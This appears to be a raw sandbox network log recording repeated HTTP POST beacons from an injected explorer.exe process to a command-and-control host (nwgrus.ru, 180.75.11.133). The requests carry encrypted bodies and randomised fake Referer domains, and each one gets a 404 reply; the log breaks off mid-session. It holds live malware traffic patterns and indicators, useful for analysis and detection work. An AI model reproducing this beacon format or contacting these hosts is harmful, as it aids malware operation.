Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:53.627556086 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://hidbwvhnrpsqtckd.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 167
    Host: nwgrus.ru
Oct 8, 2024 03:14:53.627556086 CEST | 167 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 41 42 ef e3
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuABA|N^=7n05aBy-OF //ZOWiy*@a
Oct 8, 2024 03:14:55.011884928 CEST | 189 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:54 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
    Data Ascii: #\6Y9l_m=rA


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49773 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:56.384501934 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://kldixuwrvoj.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 322
    Host: nwgrus.ru
Oct 8, 2024 03:14:56.384537935 CEST | 322 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 26 5e e0 fc
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA ,[k,vu&^W2MkU?Ey|8:mvl10yk*;&M<P#LWAypY.4:!ahGSPqzK41
Oct 8, 2024 03:14:57.757764101 CEST | 484 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:57 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49784 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:57.765925884 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://jrduoddrbbwoyfog.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 312
  Host: nwgrus.ru
Oct 8, 2024 03:14:57.765960932 CEST | 312 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 20 d9 ee
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu4 O+Qle^RfLX*7LRFATTvG2]Q$s~:HBWvT^rWv-@c& M
Oct 8, 2024 03:14:59.141500950 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:14:58 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49795 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:59.148987055 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://fadawnjwyvdbowke.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 248
  Host: nwgrus.ru
Oct 8, 2024 03:14:59.149019957 CEST | 248 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 60 56 c3 bb
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu`VTCNnJNx{q*O|767q)O 8aR75.$MHWbaT3^DGl|a\x|8^ary5Q)
Oct 8, 2024 03:15:00.543446064 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:15:00 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49803 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:15:00.551059008 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://ejoaxqvdwaljnps.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 166
  Host: nwgrus.ru
Oct 8, 2024 03:15:00.551074982 CEST | 166 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 55 20 d5 e8
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuU zZ+N;;pm*[dk?^3-!%/Z6+@sT3b#
Oct 8, 2024 03:15:01.942102909 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:15:01 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49812 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:15:01.957376957 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://qmmqfrtscgkdrbea.com/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 229
  Host: nwgrus.ru
Oct 8, 2024 03:15:01.957405090 CEST | 229 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 29 18 df 8e
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu)R,z#L%r?\&n\G$)}f9PP~%<'{m;lTJ:z7D!U;W`IoRd
Oct 8, 2024 03:15:03.346745014 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:15:03 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49822 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:15:03.354633093 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://kcwpxhfqrcwcynne.com/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 180
  Host: nwgrus.ru
Oct 8, 2024 03:15:03.354633093 CEST | 180 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 32 25 d9 a0
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu2%_r\>eeC{:)<oqJs62-H UOLNP,W%Q
Oct 8, 2024 03:15:04.734694958 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:15:04 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49831 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:15:04.742368937 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://ksfanihxkdmgc.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 180
  Host: nwgrus.ru
Oct 8, 2024 03:15:04.742368937 CEST | 180 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7d 54 d0 a8
  Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu}TUBqI<5k_yzc|!XBGI-6MM,pF8X4g
Oct 8, 2024 03:15:06.121746063 CEST | 484 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.26.0
  Date: Tue, 08 Oct 2024 01:15:05 GMT
  Content-Type: text/html; charset=utf-8
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 49841 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:15:06.130975008 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gshbntjmlxbreay.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 304
Host: nwgrus.ru
Oct 8, 2024 03:15:06.130975008 CEST | 304 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 58 07 a4 f6
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuXJ2mSD+Cg0Z(W)2nO+~dQ-2o&$ tjJbDuK1";=V3qnrzFyqs<&W1
Oct 8, 2024 03:15:07.506372929 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:15:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 50056 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:16:15.953778028 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mqkcxjfgdkafebli.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 290
Host: nwgrus.ru
Oct 8, 2024 03:16:15.953795910 CEST | 290 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 22 ba 9b
